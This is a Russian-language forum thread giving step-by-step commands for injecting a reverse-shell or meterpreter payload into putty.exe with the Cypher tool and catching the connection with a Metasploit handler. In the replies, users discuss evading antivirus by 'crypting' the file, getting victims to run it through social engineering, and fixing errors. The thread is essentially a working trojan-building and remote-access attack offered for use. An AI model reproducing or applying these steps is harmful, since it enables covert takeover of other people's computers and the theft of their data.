 |
|

11.12.2016, 00:03
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
Приветствую! В этой теме я продемонстрирую взлом удаленного хоста с помощью программы Cypher. Она позволит нам добавить полезную нагрузку в исполняемый файл (программу, игру, и т.д) не нарушая его целостности.
В качестве атакующей системы будет использоваться OS Kali Linux,
в качестве целевой системы Windows 8.1 с актуальными обновлениями.
Итак, вернемся к Cypher, скачиваем ее с Github:
> git clonehttps://github.com/xan7r/cypher
Выполняем следующие команды:
> cd cypher
> chmod a+x addShell.py
> ls –a
Теперь нам необходимо выбрать исполняемый файл для «вшивания» в него полезной нагрузки, я взял putty.exe. Скопируем Putty в директорию в Cypher.
Теперь выполним следующую команду:
> ./ addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 –p 0

В приведенной команде –p 0 – это тип полезной нагрузки, всего и х в программе доступно 5.
· 0 – windows/shell_reverse_tcp
· 1 – windows/meterpreter/reverse_http
· 2 – windows/meterpreter/reverse_http +PrependMigrate
· 3 – windows/meterpreter/reverse_https
· 4 – windows/meterpreter/reverse_https +PrependMigrate
По итогу получаем файл putty_evil.exe в папке с Cypher.
Теперь настроим на атакующем хосте handler:
> msfconsole
> use multi/handler
> set LPORT 4444
> set LHOST 192.168.0.107
> exploit

Следующим шагом будет доставка файла putty_evil.exe на целевой хост и последующий запуск приложения. После запуска, мы получаем полноценный command shell, на атакующем хосте.
Сменим кодировку командой:
> chcp 65001

Посмотрим подробную информацию о системе:
> systeminfo
Это все. Спасибо за внимание.
|
|
|

11.12.2016, 00:56
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
m0tion сказал(а):
Антивирусами палится?
8.1. - Без алертов запустился
|
|
|

11.12.2016, 20:32
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
mafiasepa сказал(а):
set LHOST 192.168.0.107(это свой ip или тест машины)?
Свой адрес
|
|
|

17.12.2016, 00:05
|
|
Новичок
Регистрация: 23.11.2016
Сообщений: 0
С нами:
4983840
Репутация:
0
|
|
Inject0r сказал(а):
Касперский палит.
Как вариант можно закриптовать )
|
|
|

09.01.2017, 13:02
|
|
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами:
4963406
Репутация:
0
|
|
Win XP Sp3 =)
После активации секунды две и ошибка, за эти секунды успевает только начать коннект (как видно на скрине внизу) =)
|
|
|

15.02.2017, 11:16
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
Darwin_Douglas сказал(а):
Как я понял,сложность состоит в том, что мне нужно доставить файл putty_evil.exe на целевую машину вручную или каким-нибудь другим способом и запустить.
Да, все верно
|
|
|

15.02.2017, 12:22
|
|
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами:
4963406
Репутация:
0
|
|
Darwin_Douglas сказал(а):
Как я понял,сложность состоит в том, что мне нужно доставить файл putty_evil.exe на целевую машину вручную или каким-нибудь другим способом и запустить.
Если внимательно почитать форум и темы про социальную инженерию, сложностью это не станет. Запуск прриложения дело времени - если файло было скачано, то явно будет и запущено.
|
|
|

20.05.2017, 01:00
|
|
Новичок
Регистрация: 24.10.2016
Сообщений: 0
С нами:
5027217
Репутация:
0
|
|
[*] Sending stage (957487 bytes) to 192.168.1.153
c 10ки пробую.
Вот такое сообщение прилетает и все более ничего не происходит в чем может быть трабл?
|
|
|

04.11.2017, 21:53
|
|
Новичок
Регистрация: 28.02.2017
Сообщений: 0
С нами:
4844417
Репутация:
0
|
|
Здравствуйте! При создании пэйлоада получаю вот такое сообщение:
пользователь@pc:~/.pentest/cypher$ sudo ./addShell.py -f putty.exe -H 192.168.1.105 -P 4444 -p 0
Traceback (most recent call last):
File "./addShell.py", line 2, in
import random, optparse, pefile, capstone, binascii, struct, os
File "/usr/local/lib/python2.7/dist-packages/capstone/__init__.py", line 230, in
raise ImportError("ERROR: fail to load the dynamic library.")
ImportError: ERROR: fail to load the dynamic library.
Подскажите, пожалуйста, чего ему не хватает?
|
|
|

07.11.2017, 16:20
|
|
Новичок
Регистрация: 06.03.2017
Сообщений: 0
С нами:
4835747
Репутация:
0
|
|
Так это джойнер получается. Как у него в целом с палевностью? Есть возможность проверить твой готовый файл, к примеру, на этом сканере?
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|